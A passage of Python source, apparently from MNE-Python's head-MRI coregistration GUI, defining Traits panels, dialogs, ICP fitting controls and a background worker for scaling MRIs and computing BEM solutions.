if self.iteration >= 0:
text += u' (iteration %d/%d, %0.1f sec)' % (
self.iteration + 1, self.icp_iterations,
time.time() - self.icp_start_time)
self.last_parameters[:] = self.parameters[:]
self.status_text = text
def _rot_x_changed(self):
self.parameters[0] = np.deg2rad(self.rot_x)
def _rot_y_changed(self):
self.parameters[1] = np.deg2rad(self.rot_y)
def _rot_z_changed(self):
self.parameters[2] = np.deg2rad(self.rot_z)
def _trans_x_changed(self):
self.parameters[3] = self.trans_x * 1e-3
def _trans_y_changed(self):
self.parameters[4] = self.trans_y * 1e-3
def _trans_z_changed(self):
self.parameters[5] = self.trans_z * 1e-3
def _scale_x_changed(self):
if self.n_scale_params == 1:
self.parameters[6:9] = [self.scale_x * 1e-2] * 3
else:
self.parameters[6] = self.scale_x * 1e-2
def _scale_y_changed(self):
self.parameters[7] = self.scale_y * 1e-2
def _scale_z_changed(self):
self.parameters[8] = self.scale_z * 1e-2
class CoregFrameHandler(Handler):
"""Check for unfinished processes before closing its window."""
def object_title_changed(self, info):
"""Set the title when it gets changed."""
info.ui.title = info.object.title
def close(self, info, is_ok):
"""Handle the close event."""
if info.object.queue.unfinished_tasks:
information(None, "Can not close the window while saving is still "
"in progress. Please wait until all MRIs are "
"processed.", "Saving Still in Progress")
return False
else:
try: # works on Qt only for now
size = (info.ui.control.width(), info.ui.control.height())
except AttributeError:
size = None
# store configuration, but don't prevent from closing on error
try:
info.object.save_config(size=size)
except Exception as exc:
warnings.warn("Error saving GUI configuration:\n%s" % (exc,))
return True
class CoregPanelHandler(Handler):
"""Open other windows with proper parenting."""
info = Instance(UIInfo)
def object_fitting_options_panel_changed(self, info): # noqa: D102
self.info = info
def object_fitting_options_changed(self, info): # noqa: D102
self.info.object.fitting_options_panel.edit_traits(
parent=self.info.ui.control)
def object_load_trans_changed(self, info): # noqa: D102
# find trans file destination
model = self.info.object.model
raw_dir = os.path.dirname(model.hsp.file)
subject = model.mri.subject
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject)
dlg = FileDialog(action="open", wildcard=trans_wildcard,
default_path=trans_file, parent=self.info.ui.control)
if dlg.open() != OK:
return
trans_file = dlg.path
try:
model.load_trans(trans_file)
except Exception as e:
error(None, "Error loading trans file %s: %s (See terminal "
"for details)" % (trans_file, e), "Error Loading Trans File")
raise
def object_save_changed(self, info): # noqa: D102
obj = self.info.object
subjects_dir = obj.model.mri.subjects_dir
subject_from = obj.model.mri.subject
# check that fiducials are saved
skip_fiducials = False
if obj.n_scale_params and not _find_fiducials_files(subject_from,
subjects_dir):
msg = ("No fiducials file has been found for {src}. If fiducials "
"are not saved, they will not be available in the scaled "
"MRI. Should the current fiducials be saved now? "
"Select Yes to save the fiducials at "
"{src}/bem/{src}-fiducials.fif. "
"Select No to proceed scaling the MRI without fiducials.".
format(src=subject_from))
title = "Save Fiducials for %s?" % subject_from
rc = confirm(self.info.ui.control, msg, title, cancel=True,
default=CANCEL)
if rc == CANCEL:
return
elif rc == YES:
obj.model.mri.save(obj.model.mri.default_fid_fname)
elif rc == NO:
skip_fiducials = True
else:
raise RuntimeError("rc=%s" % repr(rc))
# find target subject
if obj.n_scale_params:
subject_to = obj.model.raw_subject or subject_from
mridlg = NewMriDialog(subjects_dir=subjects_dir,
subject_from=subject_from,
subject_to=subject_to)
ui = mridlg.edit_traits(kind='modal',
parent=self.info.ui.control)
if not ui.result: # i.e., user pressed cancel
return
subject_to = mridlg.subject_to
else:
subject_to = subject_from
# find trans file destination
raw_dir = os.path.dirname(obj.model.hsp.file)
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject_to)
dlg = FileDialog(action="save as", wildcard=trans_wildcard,
default_path=trans_file,
parent=self.info.ui.control)
dlg.open()
if dlg.return_code != OK:
return
trans_file = dlg.path
if not trans_file.endswith('.fif'):
trans_file += '.fif'
if os.path.exists(trans_file):
answer = confirm(None, "The file %r already exists. Should it "
"be replaced?", "Overwrite File?")
if answer != YES:
return
# save the trans file
try:
obj.model.save_trans(trans_file)
except Exception as e:
error(None, "Error saving -trans.fif file: %s (See terminal for "
"details)" % (e,), "Error Saving Trans File")
raise
# save the scaled MRI
if obj.n_scale_params:
job = obj.model.get_scaling_job(subject_to, skip_fiducials)
obj.queue.put(job)
obj.queue_len += 1
def _make_view_data_panel(scrollable=False):
view = View(VGroup(
VGroup(Item('subject_panel', style='custom'), label="MRI Subject",
show_border=_SHOW_BORDER, show_labels=False),
VGroup(Item('lock_fiducials', style='custom',
editor=EnumEditor(cols=2, values={False: '2:Edit',
True: '1:Lock'}),
enabled_when='fid_ok'),
HGroup(Item('hsp_always_visible',
label='Show head shape points', show_label=True,
enabled_when='not lock_fiducials', width=-1),
show_left=False),
Item('fid_panel', style='custom'), label="MRI Fiducials",
show_border=_SHOW_BORDER, show_labels=False),
VGroup(Item('raw_src', style="custom"),
HGroup('guess_mri_subject',
Label('Guess subject from name'), show_labels=False),
VGrid(Item('grow_hair', editor=laggy_float_editor_mm,
width=_MM_WIDTH),
Label(u'ΔHair', show_label=True, width=-1), '0',
Item('distance', show_label=False, width=_MM_WIDTH,
editor=laggy_float_editor_mm),
Item('omit_points', width=_BUTTON_WIDTH),
Item('reset_omit_points', width=_RESET_WIDTH),
columns=3, show_labels=False),
Item('omitted_info', style='readonly',
width=_REDUCED_TEXT_WIDTH), label='Digitization source',
show_border=_SHOW_BORDER, show_labels=False),
VGroup(HGroup(Item('headview', style='custom'), Spring(),
show_labels=False),
Item('view_options', width=_REDUCED_TEXT_WIDTH),
label='View', show_border=_SHOW_BORDER, show_labels=False),
Spring(),
show_labels=False), kind='panel', buttons=[UndoButton],
scrollable=scrollable, handler=DataPanelHandler())
return view
def _make_view_coreg_panel(scrollable=False):
"""Generate View for CoregPanel."""
view = View(VGroup(
# Scaling
HGroup(Item('n_scale_params', label='Scaling mode',
editor=EnumEditor(values={0: '1:None',
1: '2:Uniform',
3: '3:3-axis'})), Spring()),
VGrid(Item('scale_x', editor=laggy_float_editor_scale,
show_label=True, tooltip="Scale along right-left axis (%)",
enabled_when='n_scale_params > 0', width=_SCALE_WIDTH),
Item('scale_x_dec', enabled_when='n_scale_params > 0',
width=_INC_BUTTON_WIDTH),
Item('scale_x_inc', enabled_when='n_scale_params > 0',
width=_INC_BUTTON_WIDTH),
Item('scale_step', tooltip="Scaling step (%)",
enabled_when='n_scale_params > 0', width=_SCALE_STEP_WIDTH),
Spring(),
Item('scale_y', editor=laggy_float_editor_scale, show_label=True,
enabled_when='n_scale_params > 1',
tooltip="Scale along anterior-posterior axis (%)",
width=_SCALE_WIDTH),
Item('scale_y_dec', enabled_when='n_scale_params > 1',
width=_INC_BUTTON_WIDTH),
Item('scale_y_inc', enabled_when='n_scale_params > 1',
width=_INC_BUTTON_WIDTH),
Label('(Step)', width=_SCALE_WIDTH),
Spring(),
Item('scale_z', editor=laggy_float_editor_scale, show_label=True,
enabled_when='n_scale_params > 1', width=_SCALE_WIDTH,
tooltip="Scale along anterior-posterior axis (%)"),
Item('scale_z_dec', enabled_when='n_scale_params > 1',
width=_INC_BUTTON_WIDTH),
Item('scale_z_inc', enabled_when='n_scale_params > 1',
width=_INC_BUTTON_WIDTH),
'0',
Spring(),
label='Scaling parameters', show_labels=False, columns=5,
show_border=_SHOW_BORDER),
VGrid(Item('fits_icp', enabled_when='n_scale_params > 0 and '
'n_icp_points >= 10',
tooltip="Rotate, translate, and scale the MRI to minimize "
"the distance from each digitizer point to the closest MRI "
"point (one ICP iteration)", width=_BUTTON_WIDTH),
Item('fits_fid', enabled_when='n_scale_params == 1 and '
'has_fid_data',
tooltip="Rotate, translate, and scale the MRI to minimize "
"the distance of the three fiducials.",
width=_BUTTON_WIDTH),
Item('cancels_icp', enabled_when="fits_icp_running",
tooltip='Stop ICP fitting', width=_RESET_WIDTH),
Item('reset_scale', enabled_when='n_scale_params',
tooltip="Reset scaling parameters", width=_RESET_WIDTH),
show_labels=False, columns=4),
# Translation and rotation
VGrid(Item('trans_x', editor=laggy_float_editor_mm, show_label=True,
tooltip="Move along right-left axis", width=_MM_WIDTH),
Item('trans_x_dec', width=_INC_BUTTON_WIDTH),
Item('trans_x_inc', width=_INC_BUTTON_WIDTH),
Item('trans_step', tooltip="Movement step (mm)",
width=_MM_STEP_WIDTH),
Spring(),
Item('trans_y', editor=laggy_float_editor_mm, show_label=True,
tooltip="Move along anterior-posterior axis",
width=_MM_WIDTH),
Item('trans_y_dec', width=_INC_BUTTON_WIDTH),
Item('trans_y_inc', width=_INC_BUTTON_WIDTH),
Label('(Step)', width=_MM_WIDTH),
Spring(),
Item('trans_z', editor=laggy_float_editor_mm, show_label=True,
tooltip="Move along anterior-posterior axis",
width=_MM_WIDTH),
Item('trans_z_dec', width=_INC_BUTTON_WIDTH),
Item('trans_z_inc', width=_INC_BUTTON_WIDTH),
'0',
Spring(),
Item('rot_x', editor=laggy_float_editor_deg, show_label=True,
tooltip="Tilt the digitization backward (-) or forward (+)",
width=_DEG_WIDTH),
Item('rot_x_dec', width=_INC_BUTTON_WIDTH),
Item('rot_x_inc', width=_INC_BUTTON_WIDTH),
Item('rot_step', tooltip=u"Rotation step (°)",
width=_DEG_STEP_WIDTH),
Spring(),
Item('rot_y', editor=laggy_float_editor_deg, show_label=True,
tooltip="Tilt the digitization rightward (-) or "
"leftward (+)", width=_DEG_WIDTH),
Item('rot_y_dec', width=_INC_BUTTON_WIDTH),
Item('rot_y_inc', width=_INC_BUTTON_WIDTH),
Label('(Step)', width=_DEG_WIDTH),
Spring(),
Item('rot_z', editor=laggy_float_editor_deg, show_label=True,
tooltip="Turn the digitization leftward (-) or "
"rightward (+)", width=_DEG_WIDTH),
Item('rot_z_dec', width=_INC_BUTTON_WIDTH),
Item('rot_z_inc', width=_INC_BUTTON_WIDTH),
'0',
Spring(),
columns=5, show_labels=False, show_border=_SHOW_BORDER,
label=u'Translation (Δ) and Rotation (∠)'),
VGroup(Item('fit_icp', enabled_when='n_icp_points >= 10',
tooltip="Rotate and translate the MRI to minimize the "
"distance from each digitizer point to the closest MRI "
"point (one ICP iteration)", width=_BUTTON_WIDTH),
Item('fit_fid', enabled_when="has_fid_data",
tooltip="Rotate and translate the MRI to minimize the "
"distance of the three fiducials.", width=_BUTTON_WIDTH),
Item('cancel_icp', enabled_when="fit_icp_running",
tooltip='Stop ICP iterations', width=_RESET_WIDTH),
Item('reset_tr', tooltip="Reset translation and rotation.",
width=_RESET_WIDTH),
show_labels=False, columns=4),
# Fitting weights
Item('fid_eval_str', style='readonly', tooltip='Fiducial differences',
width=_REDUCED_TEXT_WIDTH),
Item('points_eval_str', style='readonly',
tooltip='Point error (μ ± σ)', width=_REDUCED_TEXT_WIDTH),
Item('fitting_options', width=_REDUCED_TEXT_WIDTH, show_label=False),
VGrid(Item('scale_labels', label="Scale label files",
enabled_when='n_scale_params > 0'),
Item('copy_annot', label="Copy annotation files",
enabled_when='n_scale_params > 0'),
Item('prepare_bem_model', label="Prepare BEM",
enabled_when='can_prepare_bem_model'),
show_left=False, label='Subject-saving options', columns=1,
show_border=_SHOW_BORDER),
VGrid(Item('save', enabled_when='can_save',
tooltip="Save the trans file and (if scaling is enabled) "
"the scaled MRI", width=_BUTTON_WIDTH),
Item('load_trans', width=_BUTTON_WIDTH,
tooltip="Load Head<->MRI trans file"),
Item('reset_params', tooltip="Reset all coregistration "
"parameters", width=_RESET_WIDTH),
show_labels=False, columns=3),
Spring(),
show_labels=False), kind='panel', buttons=[UndoButton],
scrollable=scrollable, handler=CoregPanelHandler())
return view
class FittingOptionsPanel(HasTraits):
"""View options panel."""
model = Instance(CoregModel)
lpa_weight = DelegatesTo('model')
nasion_weight = DelegatesTo('model')
rpa_weight = DelegatesTo('model')
hsp_weight = DelegatesTo('model')
eeg_weight = DelegatesTo('model')
hpi_weight = DelegatesTo('model')
has_lpa_data = DelegatesTo('model')
has_nasion_data = DelegatesTo('model')
has_rpa_data = DelegatesTo('model')
has_hsp_data = DelegatesTo('model')
has_eeg_data = DelegatesTo('model')
has_hpi_data = DelegatesTo('model')
icp_iterations = DelegatesTo('model')
icp_start_time = DelegatesTo('model')
icp_angle = DelegatesTo('model')
icp_distance = DelegatesTo('model')
icp_scale = DelegatesTo('model')
icp_fid_match = DelegatesTo('model')
n_scale_params = DelegatesTo('model')
view = View(VGroup(
VGrid(HGroup(Item('icp_iterations', label='Iterations',
width=_MM_WIDTH, tooltip='Maximum ICP iterations to '
'perform (per click)'),
Spring(), show_labels=True), label='ICP iterations (max)',
show_border=_SHOW_BORDER),
VGrid(Item('icp_angle', label=u'Angle (°)', width=_MM_WIDTH,
tooltip='Angle convergence threshold'),
Item('icp_distance', label='Distance (mm)', width=_MM_WIDTH,
tooltip='Distance convergence threshold'),
Item('icp_scale', label='Scale (%)',
tooltip='Scaling convergence threshold', width=_MM_WIDTH,
enabled_when='n_scale_params > 0'),
show_labels=True, label='ICP convergence limits', columns=3,
show_border=_SHOW_BORDER),
VGrid(Item('icp_fid_match', width=-1, show_label=False,
editor=EnumEditor(values=dict(
nearest='1:Closest to surface',
matched='2:MRI fiducials'), cols=2,
format_func=lambda x: x),
tooltip='Match digitization fiducials to MRI fiducials or '
'the closest surface point', style='custom'),
label='Fiducial point matching', show_border=_SHOW_BORDER),
VGrid(
VGrid(Item('lpa_weight', editor=laggy_float_editor_weight,
tooltip="Relative weight for LPA", width=_WEIGHT_WIDTH,
enabled_when='has_lpa_data', label='LPA'),
Item('nasion_weight', editor=laggy_float_editor_weight,
tooltip="Relative weight for nasion", label='Nasion',
width=_WEIGHT_WIDTH, enabled_when='has_nasion_data'),
Item('rpa_weight', editor=laggy_float_editor_weight,
tooltip="Relative weight for RPA", width=_WEIGHT_WIDTH,
enabled_when='has_rpa_data', label='RPA'),
columns=3, show_labels=True, show_border=_SHOW_BORDER,
label='Fiducials'),
VGrid(Item('hsp_weight', editor=laggy_float_editor_weight,
tooltip="Relative weight for head shape points",
enabled_when='has_hsp_data',
label='HSP', width=_WEIGHT_WIDTH,),
Item('eeg_weight', editor=laggy_float_editor_weight,
tooltip="Relative weight for EEG points", label='EEG',
enabled_when='has_eeg_data', width=_WEIGHT_WIDTH),
Item('hpi_weight', editor=laggy_float_editor_weight,
tooltip="Relative weight for HPI points", label='HPI',
enabled_when='has_hpi_data', width=_WEIGHT_WIDTH),
columns=3, show_labels=True, show_border=_SHOW_BORDER,
label='Other points (closest-point matched)'),
show_labels=False, label='Point weights', columns=2,
show_border=_SHOW_BORDER),
), title="Fitting options")
_DEFAULT_PARAMETERS = (0., 0., 0., 0., 0., 0., 1., 1., 1.)
class CoregPanel(HasPrivateTraits):
"""Coregistration panel for Head<->MRI with scaling."""
model = Instance(CoregModel)
# parameters
reset_params = Button(label=_RESET_LABEL)
n_scale_params = DelegatesTo('model')
parameters = DelegatesTo('model')
scale_step = Float(1.)
scale_x = DelegatesTo('model')
scale_x_dec = Button('-')
scale_x_inc = Button('+')
scale_y = DelegatesTo('model')
scale_y_dec = Button('-')
scale_y_inc = Button('+')
scale_z = DelegatesTo('model')
scale_z_dec = Button('-')
scale_z_inc = Button('+')
rot_step = Float(1.)
rot_x = DelegatesTo('model')
rot_x_dec = Button('-')
rot_x_inc = Button('+')
rot_y = DelegatesTo('model')
rot_y_dec = Button('-')
rot_y_inc = Button('+')
rot_z = DelegatesTo('model')
rot_z_dec = Button('-')
rot_z_inc = Button('+')
trans_step = Float(1.)
trans_x = DelegatesTo('model')
trans_x_dec = Button('-')
trans_x_inc = Button('+')
trans_y = DelegatesTo('model')
trans_y_dec = Button('-')
trans_y_inc = Button('+')
trans_z = DelegatesTo('model')
trans_z_dec = Button('-')
trans_z_inc = Button('+')
# fitting
has_lpa_data = DelegatesTo('model')
has_nasion_data = DelegatesTo('model')
has_rpa_data = DelegatesTo('model')
has_fid_data = DelegatesTo('model')
has_hsp_data = DelegatesTo('model')
has_eeg_data = DelegatesTo('model')
has_hpi_data = DelegatesTo('model')
n_icp_points = DelegatesTo('model')
# fitting with scaling
fits_icp = Button(label='Fit (ICP)')
fits_fid = Button(label='Fit Fid.')
cancels_icp = Button(u'■')
reset_scale = Button(label=_RESET_LABEL)
fits_icp_running = DelegatesTo('model')
# fitting without scaling
fit_icp = Button(label='Fit (ICP)')
fit_fid = Button(label='Fit Fid.')
cancel_icp = Button(label=u'■')
reset_tr = Button(label=_RESET_LABEL)
fit_icp_running = DelegatesTo('model')
# fit info
fid_eval_str = DelegatesTo('model')
points_eval_str = DelegatesTo('model')
# saving
can_prepare_bem_model = DelegatesTo('model')
can_save = DelegatesTo('model')
scale_labels = DelegatesTo('model')
copy_annot = DelegatesTo('model')
prepare_bem_model = DelegatesTo('model')
save = Button(label="Save...")
load_trans = Button(label='Load...')
queue = Instance(queue.Queue, ())
queue_feedback = Str('')
queue_current = Str('')
queue_len = Int(0)
queue_status_text = Property(
Str, depends_on=['queue_feedback', 'queue_current', 'queue_len'])
fitting_options_panel = Instance(FittingOptionsPanel)
fitting_options = Button('Fitting options...')
def _fitting_options_panel_default(self):
return FittingOptionsPanel(model=self.model)
view = _make_view_coreg_panel()
def __init__(self, *args, **kwargs): # noqa: D102
super(CoregPanel, self).__init__(*args, **kwargs)
# Setup scaling worker
def worker():
while True:
(subjects_dir, subject_from, subject_to, scale, skip_fiducials,
include_labels, include_annot, bem_names) = self.queue.get()
self.queue_len -= 1
# Scale MRI files
self.queue_current = 'Scaling %s...' % subject_to
try:
scale_mri(subject_from, subject_to, scale, True,
subjects_dir, skip_fiducials, include_labels,
include_annot)
except Exception:
logger.error('Error scaling %s:\n' % subject_to +
traceback.format_exc())
self.queue_feedback = ('Error scaling %s (see Terminal)' %
subject_to)
bem_names = () # skip bem solutions
else:
self.queue_feedback = 'Done scaling %s' % subject_to
# Precompute BEM solutions
for bem_name in bem_names:
self.queue_current = ('Computing %s solution...' %
bem_name)
try:
bem_file = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to,
name=bem_name)
bemsol = make_bem_solution(bem_file)
write_bem_solution(bem_file[:-4] + '-sol.fif', bemsol)
except Exception:
logger.error('Error computing %s solution:\n' %
bem_name + traceback.format_exc())
self.queue_feedback = ('Error computing %s solution '
'(see Terminal)' % bem_name)
else:
self.queue_feedback = ('Done computing %s solution' %
bem_name)
# Finalize
self.queue_current = ''
self.queue.task_done()
t = Thread(target=worker)
t.daemon = True
t.start()
@cached_property
def _get_queue_status_text(self):
items = []
if self.queue_current:
items.append(self.queue_current)
if self.queue_feedback:
items.append(self.queue_feedback)
if self.queue_len:
items.append("%i queued" % self.queue_len)
return ' | '.join(items)
@cached_property
def _get_rotation(self):
rot = np.array([self.rot_x, self.rot_y, self.rot_z])
return rot
@cached_property
def _get_translation(self):
trans = np.array([self.trans_x, self.trans_y, self.trans_z])
return trans
def _n_scale_params_fired(self):
if self.n_scale_params == 0:
use = [1] * 3
elif self.n_scale_params == 1:
use = [np.mean([self.scale_x, self.scale_y, self.scale_z]) /
100.] * 3
else:
use = self.parameters[6:9]
self.parameters[6:9] = use
def _fit_fid_fired(self):
with busy():
self.model.fit_fiducials(0)
def _fit_icp_fired(self):
with busy():
self.model.fit_icp(0)
def _fits_fid_fired(self):
with busy():
self.model.fit_fiducials()
def _fits_icp_fired(self):
with busy():
self.model.fit_icp()
def _cancel_icp_fired(self):
self.fit_icp_running = False
def _cancels_icp_fired(self):
self.fits_icp_running = False
def _reset_scale_fired(self):
self.reset_traits(('scale_x', 'scale_y', 'scale_z'))
def _reset_tr_fired(self):
self.reset_traits(('trans_x', 'trans_y', 'trans_z',
'rot_x', 'rot_y', 'rot_z'))
def _reset_params_fired(self):
self.model.reset()
def _rot_x_dec_fired(self):
self.rot_x -= self.rot_step
def _rot_x_inc_fired(self):
self.rot_x += self.rot_step
def _rot_y_dec_fired(self):
self.rot_y -= self.rot_step
def _rot_y_inc_fired(self):
self.rot_y += self.rot_step
def _rot_z_dec_fired(self):
self.rot_z -= self.rot_step
def _rot_z_inc_fired(self):
self.rot_z += self.rot_step
def _scale_x_dec_fired(self):
self.scale_x -= self.scale_step
def _scale_x_inc_fired(self):
self.scale_x += self.scale_step
def _scale_y_dec_fired(self):
self.scale_y -= self.scale_step
def _scale_y_inc_fired(self):
self.scale_y += self.scale_step
def _scale_z_dec_fired(self):
self.scale_z -= self.scale_step
def _scale_z_inc_fired(self):
self.scale_z += self.scale_step
def _trans_x_dec_fired(self):
self.trans_x -= self.trans_step
def _trans_x_inc_fired(self):
self.trans_x += self.trans_step
def _trans_y_dec_fired(self):
self.trans_y -= self.trans_step
def _trans_y_inc_fired(self):
self.trans_y += self.trans_step
def _trans_z_dec_fired(self):
self.trans_z -= self.trans_step
def _trans_z_inc_fired(self):
self.trans_z += self.trans_step
class NewMriDialog(HasPrivateTraits):
"""New MRI dialog."""
# Dialog to determine target subject name for a scaled MRI
subjects_dir = Directory
subject_to = Str
subject_from = Str
subject_to_dir = Property(depends_on=['subjects_dir', 'subject_to'])
subject_to_exists = Property(Bool, depends_on='subject_to_dir')
feedback = Str(' ' * 100)
can_overwrite = Bool
overwrite = Bool
can_save = Bool
view = View(Item('subject_to', label='New MRI Subject Name', tooltip="A "
"new folder with this name will be created in the "
"current subjects_dir for the scaled MRI files"),
Item('feedback', show_label=False, style='readonly'),
Item('overwrite', enabled_when='can_overwrite', tooltip="If a "
"subject with the chosen name exists, delete the old "
"subject"),
buttons=[CancelButton,
Action(name='OK', enabled_when='can_save')])
def _can_overwrite_changed(self, new):
if not new:
self.overwrite = False
@cached_property
def _get_subject_to_dir(self):
return os.path.join(self.subjects_dir, self.subject_to)
@cached_property
def _get_subject_to_exists(self):
if not self.subject_to:
return False
elif os.path.exists(self.subject_to_dir):
return True
else:
return False
@on_trait_change('subject_to_dir,overwrite')
def update_dialog(self):
if not self.subject_from:
# weird trait state that occurs even when subject_from is set
return
elif not self.subject_to:
self.feedback = "No subject specified..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to == self.subject_from:
self.feedback = "Must be different from MRI source subject..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to_exists:
if self.overwrite:
self.feedback = "%s will be overwritten." % self.subject_to
self.can_save = True
self.can_overwrite = True
else:
self.feedback = "Subject already exists..."
self.can_save = False
self.can_overwrite = True
else:
self.feedback = "Name ok."
self.can_save = True
self.can_overwrite = False
def _make_view(tabbed=False, split=False, width=800, height=600,
scrollable=True):
"""Create a view for the CoregFrame."""
# Set the width to 0.99 to "push out" as much as possible, use
# scene_width in the View below
scene = Item('scene', show_label=False, width=0.99,
editor=SceneEditor(scene_class=MayaviScene))
data_panel = VGroup(
Item('data_panel', style='custom',
width=_COREG_WIDTH if scrollable else 1,
editor=InstanceEditor(view=_make_view_data_panel(scrollable))),
label='Data', show_border=not scrollable, show_labels=False)
# Setting `scrollable=True` for a Group does not seem to have any effect
# (macOS), in order to be effective the parameter has to be set for a View
# object; hence we use a special InstanceEditor to set the parameter
# programmatically:
coreg_panel = VGroup(
Item('coreg_panel', style='custom',
width=_COREG_WIDTH if scrollable else 1,
editor=InstanceEditor(view=_make_view_coreg_panel(scrollable))),
label="Coregistration", show_border=not scrollable, show_labels=False,
enabled_when="data_panel.fid_panel.locked")
main_layout = 'split' if split else 'normal'
if tabbed:
main = HGroup(scene,
Group(data_panel, coreg_panel, show_labels=False,
layout='tabbed'),
layout=main_layout)
else:
main = HGroup(data_panel, scene, coreg_panel, show_labels=False,
layout=main_layout)
# Here we set the width and height to impossibly small numbers to force the
# window to be as tight as possible
view = View(main, resizable=True, handler=CoregFrameHandler(),
buttons=NoButtons, width=width, height=height,
statusbar=[StatusItem('status_text', width=0.55),
StatusItem('queue_status_text', width=0.45)])
return view
class ViewOptionsPanel(HasTraits):
"""View options panel."""
mri_obj = Instance(SurfaceObject)
hsp_obj = Instance(PointObject)
eeg_obj = Instance(PointObject)
hpi_obj = Instance(PointObject)
hsp_cf_obj = Instance(PointObject)
mri_cf_obj = Instance(PointObject)
bgcolor = RGBColor()
coord_frame = Enum('mri', 'head', label='Display coordinate frame')
head_high_res = Bool(True, label='Show high-resolution head')
advanced_rendering = Bool(True, label='Use advanced OpenGL',
desc='Enable advanced OpenGL methods that do '
'not work with all renderers (e.g., depth '
'peeling)')
view = View(
VGroup(
Item('mri_obj', style='custom', label="MRI"),
Item('hsp_obj', style='custom', label="Head shape"),
Item('eeg_obj', style='custom', label='EEG'),
Item('hpi_obj', style='custom', label='HPI'),
VGrid(Item('coord_frame', style='custom',
editor=EnumEditor(values={'mri': '1:MRI',
'head': '2:Head'}, cols=2,
format_func=_pass)),
Item('head_high_res'), Spring(),
Item('advanced_rendering'),
Spring(), Spring(), columns=3, show_labels=True),
Item('hsp_cf_obj', style='custom', label='Head axes'),
Item('mri_cf_obj', style='custom', label='MRI axes'),
HGroup(Item('bgcolor', label='Background'), Spring()),
), title="Display options")
class DataPanelHandler(Handler):
"""Open other windows with proper parenting."""
info = Instance(UIInfo)
def object_view_options_panel_changed(self, info): # noqa: D102
self.info = info
def object_view_options_changed(self, info): # noqa: D102
self.info.object.view_options_panel.edit_traits(
parent=self.info.ui.control)
class DataPanel(HasTraits):
"""Data loading panel."""
# Set by CoregPanel
model = Instance(CoregModel)
scene = Instance(MlabSceneModel, ())
lock_fiducials = DelegatesTo('model')
guess_mri_subject = DelegatesTo('model')
raw_src = DelegatesTo('model', 'hsp')
# Set internally
subject_panel = Instance(SubjectSelectorPanel)
fid_panel = Instance(FiducialsPanel)
headview = Instance(HeadViewController)
view_options_panel = Instance(ViewOptionsPanel)
hsp_always_visible = Bool(False, label="Always Show Head Shape")
view_options = Button(label="Display options...")
# Omit Points
distance = Float(10., desc="maximal distance for head shape points from "
"the surface (mm)")
omit_points = Button(label='Omit', desc="to omit head shape points "
"for the purpose of the automatic coregistration "
"procedure (mm).")
grow_hair = DelegatesTo('model')
reset_omit_points = Button(label=_RESET_LABEL, desc="to reset the "
"omission of head shape points to include all.")
omitted_info = Str('No points omitted')
def _subject_panel_default(self):
return SubjectSelectorPanel(model=self.model.mri.subject_source)
def _fid_panel_default(self):
return FiducialsPanel(model=self.model.mri, headview=self.headview)
def _headview_default(self):
return HeadViewController(system='RAS', scene=self.scene)
def _omit_points_fired(self):
distance = self.distance / 1000.
self.model.omit_hsp_points(distance)
n_omitted = self.model.hsp.n_omitted
self.omitted_info = (
"%s pt%s omitted (%0.1f mm)"
% (n_omitted if n_omitted > 0 else 'No', _pl(n_omitted),
self.distance))
@on_trait_change('model:hsp:file')
def _file_change(self):
self._reset_omit_points_fired()
def _reset_omit_points_fired(self):
self.model.omit_hsp_points(np.inf)
self.omitted_info = 'No points omitted (reset)'
class CoregFrame(HasTraits):
"""GUI for head-MRI coregistration."""
model = Instance(CoregModel)
scene = Instance(MlabSceneModel, ())
head_high_res = Bool(True)
advanced_rendering = Bool(True)
data_panel = Instance(DataPanel)
coreg_panel = Instance(CoregPanel) # right panel
project_to_surface = DelegatesTo('eeg_obj')
orient_to_surface = DelegatesTo('hsp_obj')
scale_by_distance = DelegatesTo('hsp_obj')
mark_inside = DelegatesTo('hsp_obj')
status_text = DelegatesTo('model')
queue_status_text = DelegatesTo('coreg_panel')
fid_ok = DelegatesTo('model', 'mri.fid_ok')
lock_fiducials = DelegatesTo('model')
title = Str('MNE Coreg')
# visualization (MRI)
mri_obj = Instance(SurfaceObject)
mri_lpa_obj = Instance(PointObject)
mri_nasion_obj = Instance(PointObject)
mri_rpa_obj = Instance(PointObject)
bgcolor = RGBColor((0.5, 0.5, 0.5))
# visualization (Digitization)
hsp_obj = Instance(PointObject)
eeg_obj = Instance(PointObject)
hpi_obj = Instance(PointObject)
hsp_lpa_obj = Instance(PointObject)
hsp_nasion_obj = Instance(PointObject)
hsp_rpa_obj = Instance(PointObject)
hsp_visible = Property(depends_on=['data_panel:hsp_always_visible',
'lock_fiducials'])
# Coordinate frame axes
hsp_cf_obj = Instance(PointObject)
mri_cf_obj = Instance(PointObject)
picker = Instance(object)
# Processing
queue = DelegatesTo('coreg_panel')
view = _make_view()
def _model_default(self):
return CoregModel(
scale_labels=self._config.get(
'MNE_COREG_SCALE_LABELS', 'true') == 'true',
copy_annot=self._config.get(
'MNE_COREG_COPY_ANNOT', 'true') == 'true',
prepare_bem_model=self._config.get(
'MNE_COREG_PREPARE_BEM', 'true') == 'true')
def _data_panel_default(self):
return DataPanel(model=self.model, scene=self.scene)
def _coreg_panel_default(self):
return CoregPanel(model=self.model)
def __init__(self, raw=None, subject=None, subjects_dir=None,
guess_mri_subject=True, head_opacity=1.,
head_high_res=True, trans=None, config=None,
project_eeg=False, orient_to_surface=False,
scale_by_distance=False, mark_inside=False,
interaction='trackball', scale=0.16,
advanced_rendering=True): # noqa: D102
self._config = config or {}
super(CoregFrame, self).__init__(guess_mri_subject=guess_mri_subject,
head_high_res=head_high_res,
advanced_rendering=advanced_rendering)
self._initial_kwargs = dict(project_eeg=project_eeg,
orient_to_surface=orient_to_surface,
scale_by_distance=scale_by_distance,
mark_inside=mark_inside,
head_opacity=head_opacity,
interaction=interaction,
scale=scale)
self._locked_opacity = self._initial_kwargs['head_opacity']
if not 0 <= head_opacity <= 1:
raise ValueError(
"head_opacity needs to be a floating point number between 0 "
"and 1, got %r" % (head_opacity,))
if (subjects_dir is not None) and os.path.isdir(subjects_dir):
self.model.mri.subjects_dir = subjects_dir
if raw is not None:
self.model.hsp.file = raw
if subject is not None:
if subject not in self.model.mri.subject_source.subjects:
msg = "%s is not a valid subject. " % subject
# no subjects -> ['']
if any(self.model.mri.subject_source.subjects):
ss = ', '.join(self.model.mri.subject_source.subjects)
msg += ("The following subjects have been found: %s "
"(subjects_dir=%s). " %
(ss, self.model.mri.subjects_dir))
else:
